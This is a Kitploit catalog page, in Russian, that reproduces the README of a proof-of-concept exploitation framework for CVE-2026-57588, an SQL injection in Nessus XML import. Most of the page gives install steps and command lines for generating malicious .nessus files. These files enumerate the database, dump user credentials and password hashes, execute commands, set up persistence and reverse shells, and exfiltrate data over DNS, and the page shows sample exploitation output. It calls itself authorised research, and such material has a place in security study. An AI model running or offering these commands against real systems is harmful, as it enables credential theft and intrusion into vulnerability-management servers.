Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — PoC для CVE-2026-57588 - SQL-инъекция в импорте XML Nessus 10.12.0. Генерирует вредоносные .nessus файлы для перечисления баз данных, эксфильтрации учетных данных и тестирования time-based blind injection. Для авторизованных исследований безопасности. Автор: Sudeepa Wanigarathna. Исправлено в 10.12.1. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхПост-эксплуатацияТестирование на ПроникновениеКомандование и Управление
Red Teaming
Безопасность Баз Данных
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

Репозиторий
1172 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

PoC для CVE-2026-57588 - SQL-инъекция в импорте XML Nessus 10.12.0. Генерирует вредоносные .nessus файлы для перечисления баз данных, эксфильтрации учетных данных и тестирования time-based blind injection. Для авторизованных исследований безопасности. Автор: Sudeepa Wanigarathna. Исправлено в 10.12.1.

Поделиться

🛡️ CVE-2026-57588 - Фреймворк эксплуатации SQL-инъекции Nessus

Security Research CVE Version Python License


📋 Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Установка
  • Быстрый старт
  • Примеры использования
  • Типы пейлоадов
  • Расширенные сценарии
  • Отчетность
  • Устранение неполадок
  • Соображения безопасности
  • Лицензия

🔍 Обзор

CVE-2026-57588 — критическая уязвимость SQL-инъекции, обнаруженная в Tenable Nessus версий 10.12.0 и более ранних. Уязвимость находится в механизме разбора XML при импорте файлов результатов сканирования .nessus, позволяя аутентифицированным пользователям с правами импорта выполнять произвольные SQL-запросы к бэкенд-базе данных PostgreSQL.


⚠️ Детали уязвимости

ПараметрЗначение
CVE IDCVE-2026-57588
Тип уязвимостиSQL-инъекция
Затронутые продуктыTenable Nessus 10.12.0 и более ранние
Исправленная версияNessus 10.12.1 и новее
Оценка CVSS4.3 (Средняя)
Вектор атакиСеть
Сложность атакиНизкая
Необходимые привилегииАутентифицированный (права импорта)
Взаимодействие пользователяТребуется (социальная инженерия)
ВоздействиеИзвлечение данных, удаленное выполнение кода

🔬 Технические детали

Уязвимость существует из-за недостаточной санитизации значений XML-тегов перед их включением в SQL-запросы в процессе импорта. Злоумышленник может создать файл .nessus, содержащий специально сформированные пейлоады SQL-инъекций в таких XML-тегах, как:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

Когда привилегированный пользователь импортирует вредоносный файл, несанитизированные значения выполняются против бэкенда PostgreSQL, что позволяет:

  • Перечисление базы данных
  • Извлечение данных
  • Выполнение команд
  • Доступ к файловой системе
  • Установка персистентности

✨ Возможности

Нажмите, чтобы развернуть список возможностей

🎯 Управление пейлоадами

  • 13+ типов пейлоадов, классифицированных по назначению
  • Шаблонная генерация пейлоадов
  • Создание и валидация пользовательских пейлоадов
  • Валидация параметров и проверка синтаксиса
  • Проверка синтаксиса SQL

🚀 Возможности эксплуатации

  • Многоэтапная эксплуатация с параллельным выполнением
  • Снятие отпечатков и перечисление базы данных
  • Извлечение данных с настраиваемым выбором таблиц/столбцов
  • Выполнение команд на целевой системе
  • Доступ к файловой системе и чтение файлов
  • Обратная оболочка с интерактивной сессией
  • Механизмы установки персистентности
  • Слепая SQL-инъекция на основе времени
  • Слепая SQL-инъекция на основе булевых значений
  • SQL-инъекция на основе ошибок
  • Стековые запросы для продвинутой эксплуатации
  • Внеполосное извлечение данных через DNS

📊 Отчетность и логирование

  • HTML-отчеты с профессиональным стилем
  • Markdown-отчеты для документации
  • JSON-отчеты для автоматизации
  • Текстовые отчеты для быстрого просмотра
  • Ротация логов с несколькими уровнями
  • Детальная статистика выполнения
  • Хеширование файлов для проверки целостности

🛠️ Расширенные возможности

  • Параллельное выполнение с настраиваемым числом задач
  • Поддержка прокси для скрытных операций
  • Обработка сертификатов SSL/TLS
  • Валидация XML и проверка схемы
  • Интерактивный режим для живой эксплуатации
  • Механизм повторных попыток для надежности
  • Настройка тайм-аута для медленных соединений

📦 Профессиональный инструментарий

  • Структура CLI на основе подкоманд
  • Подробный и тихий режимы
  • Цветной вывод в терминале
  • Индикаторы прогресса для длительных задач
  • Поддержка Docker для контейнеризированного тестирования
  • Кроссплатформенная совместимость (Linux, Windows, macOS)

📦 Установка

🐍 Предварительные требования

  • Python 3.7 или выше
  • pip (менеджер пакетов Python)
  • Git (опционально, для клонирования)

🔧 Быстрая установка

# Клонировать репозиторий
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Создать и активировать виртуальное окружение
python3 -m venv venv
source venv/bin/activate  # На Windows: venv\Scripts\activate

# Установить зависимости
pip install -r requirements.txt

# Проверить установку
python3 exploit.py --version

🐳 Установка через Docker

# Собрать Docker-образ
docker build -t nessus-exploit .

# Запустить инструмент
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 Установка пакета

# Установить как пакет
pip install -e .

# Теперь можно запускать из любой директории
nessus-exploit generate -u https://test.com -p enum

🚀 Быстрый старт

Базовое использование

# Сгенерировать базовый эксплойт для перечисления
python3 exploit.py generate -u https://test.com -p enum

# Сгенерировать продвинутый многоэтапный эксплойт
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# Извлечь данные из базы данных
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

Справка по командам

# Показать общую справку
python3 exploit.py --help

# Показать справку по команде generate
python3 exploit.py generate --help

# Список всех доступных пейлоадов
python3 exploit.py list

💡 Примеры использования

1. Базовое перечисление

python3 exploit.py generate -u https://test.com -p enum
Ожидаемый вывод
[2026-07-22 10:15:23] [INFO] [*] Начало эксплуатации против https://test.com
[2026-07-22 10:15:23] [INFO] [*] Сессия: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Пейлоад: enum
[2026-07-22 10:15:23] [INFO] [*] Выполнение этапа: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Сгенерирован XML: exploit_20260722_fingerprint_101523.nessus (3847 байт)
[2026-07-22 10:15:24] [INFO] [*] Выполнение этапа: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Сгенерирован XML: exploit_20260722_schema_dump_101524.nessus (4213 байт)
[2026-07-22 10:15:25] [INFO] [+] Эксплуатация завершена! Длительность: 2.15с

============================================================
СВОДКА ЭКСПЛУАТАЦИИ
============================================================
Цель: https://test.com
Статус: УСПЕХ
Длительность: 2.15с
Сгенерировано файлов: 3
Сгенерировано отчетов: 3
============================================================

2. Продвинутая многоэтапная эксплуатация

python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. Извлечение данных

# Извлечь учетные данные пользователей
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Извлечь с пользовательскими столбцами
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status

4. Обратная оболочка

Скачать инструмент